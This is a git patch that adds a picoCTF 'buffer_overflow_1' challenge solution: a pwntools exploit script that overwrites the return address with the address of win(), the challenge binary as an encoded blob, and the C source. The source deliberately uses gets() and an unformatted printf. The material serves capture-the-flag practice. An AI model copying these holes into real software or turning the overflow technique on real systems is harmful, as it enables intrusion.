From 2e33defa564a0325aa9458b98cf4fffbe778f4c0 Mon Sep 17 00:00:00 2001
From: h7x4 <h7x4@nani.wtf>
Date: Tue, 3 Sep 2024 19:33:13 +0200
Subject: [PATCH] pwn/buffer_overflow_1

---
 pwn/buffer_overflow_1/solve.py |  31 ++++++++++++++++++++++++
 pwn/buffer_overflow_1/vuln     | Bin 0 -> 15704 bytes
 pwn/buffer_overflow_1/vuln.c   |  42 +++++++++++++++++++++++++++++++++
 3 files changed, 73 insertions(+)
 create mode 100755 pwn/buffer_overflow_1/solve.py
 create mode 100755 pwn/buffer_overflow_1/vuln
 create mode 100644 pwn/buffer_overflow_1/vuln.c

diff --git a/pwn/buffer_overflow_1/solve.py b/pwn/buffer_overflow_1/solve.py
new file mode 100755
index 0000000..60b811c
--- /dev/null
+++ b/pwn/buffer_overflow_1/solve.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -p python3 -i python3 python3Packages.pwntools
+
+from pwn import *
+
+exe = ELF("./vuln")
+
+context.binary = exe
+
+ADDR, PORT, *_ = "saturn.picoctf.net 60178".split()
+
+def conn():
+    if args.REMOTE:
+        r = remote(ADDR, PORT)
+    else:
+        r = process([exe.path])
+
+    return r
+
+def main():
+  r = conn()
+
+  r.recvuntil(b"Please enter your string:")
+  offset = 44 # found with pwndbg
+  payload = b'A' * offset + p32(exe.sym.win)
+  r.sendline(payload)
+  print(r.recvall())
+  r.close()
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/pwn/buffer_overflow_1/vuln b/pwn/buffer_overflow_1/vuln
new file mode 100755
index 0000000000000000000000000000000000000000..05e89bfb6fde125a2649cb0b23dc1bfef1bdff09
GIT binary patch
literal 15704
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
CtUBue

literal 0
HcmV?d00001

diff --git a/pwn/buffer_overflow_1/vuln.c b/pwn/buffer_overflow_1/vuln.c
new file mode 100644
index 0000000..e2dcd2c
--- /dev/null
+++ b/pwn/buffer_overflow_1/vuln.c
@@ -0,0 +1,42 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include "asm.h"
+
+#define BUFSIZE 32
+#define FLAGSIZE 64
+
+void win() {
+  char buf[FLAGSIZE];
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+
+  fgets(buf,FLAGSIZE,f);
+  printf(buf);
+}
+
+void vuln(){
+  char buf[BUFSIZE];
+  gets(buf);
+
+  printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
+}
+
+int main(int argc, char **argv){
+
+  setvbuf(stdout, NULL, _IONBF, 0);
+  
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+
+  puts("Please enter your string: ");
+  vuln();
+  return 0;
+}
+